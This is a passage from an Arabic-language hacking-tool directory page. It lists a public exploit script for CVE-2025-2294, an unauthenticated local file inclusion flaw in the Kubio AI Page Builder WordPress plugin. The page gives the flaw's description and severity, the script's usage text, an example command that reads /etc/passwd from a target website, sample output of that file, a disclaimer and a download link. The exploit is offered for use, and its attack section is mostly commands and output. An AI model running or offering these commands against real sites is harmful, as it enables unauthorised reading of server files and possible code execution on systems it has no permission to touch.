Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-2294 — Kubio AI Page Builder <= 2.5.1 - تضمين ملفات محلي دون مصادقة | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-2294
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2025-2294

CVE-2025-2294

Kubio AI Page Builder <= 2.5.1 - تضمين ملفات محلي دون مصادقة

عرض المستودع
32منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚨 Kubio AI Page Builder <= 2.5.1 - إدراج الملفات المحلي غير المصادق عليه

📝 الوصف

إضافة Kubio AI Page Builder لـ WordPress معرضة لثغرة إدراج الملفات المحلي في جميع الإصدارات حتى 2.5.1 وما يشملها عبر دالة kubio_hybrid_theme_load_template. وهذا يتيح للمهاجمين غير المصادقين إدراج وتنفيذ ملفات عشوائية على الخادم، مما يسمح بتنفيذ أي كود PHP في تلك الملفات. يمكن استخدام هذا لتجاوز ضوابط الوصول، أو الحصول على بيانات حساسة، أو تحقيق تنفيذ الكود في الحالات التي يمكن فيها رفع وتضمين الصور وأنواع الملفات "الآمنة" الأخرى.

  • CVE: CVE-2025-2294
  • CVSS: 9.8 (حرجة)
  • نُشر علنًا: 27 مارس 2025
  • آخر تحديث: 27 مارس 2025

💥 تفاصيل الاستغلال

يستغل هذا السكربت الثغرة في إضافة Kubio AI Page Builder لإدراج وتنفيذ ملفات عشوائية على الخادم. يسمح الاستغلال للمهاجمين غير المصادقين بقراءة ملفات حساسة من الخادم.

⚙️ المتطلبات

  • Python 3.x
  • مكتبة requests

🚀 الاستخدام

root@kitploit:~
usage: CVE-2025-2294.py [-h] -u URL [-f FILE]

Exploit for CVE-2025-2294 Kubio AI Page Builder <= 2.5.1 - Unauthenticated Local File Inclusion # By:Nxploited Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target base URL (e.g., https://example.com)
  -f FILE, --file FILE  File to read (default: /etc/passwd)

📋 مثال

root@kitploit:~
python3 CVE-2025-2294.py -u https://targetwebsite.com -f /etc/passwd

🔍 المخرجات

root@kitploit:~
[+] Target is vulnerable. Exploiting...
[+] Exploit successful. File content:
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:992:992:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:102::/nonexistent:/usr/sbin/nologin
tss:x:101:104:TPM software stack,,,:/var/lib/tpm:/bin/false
strongswan:x:102:65534::/var/lib/strongswan:/usr/sbin/nologin
tcpdump:x:103:105::/nonexistent:/usr/sbin/nologin
sshd:x:104:65534::/run/sshd:/usr/sbin/nologin
usbmux:x:105:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin


⚠️ إخلاء المسؤولية

يُقدَّم هذا الاستغلال لأغراض تعليمية فقط. المؤلف غير مسؤول عن أي إساءة استخدام لهذه الأداة. استخدمها على مسؤوليتك الخاصة.

بواسطة: Nxploited | Khaled Alenazi

تنزيل الأداة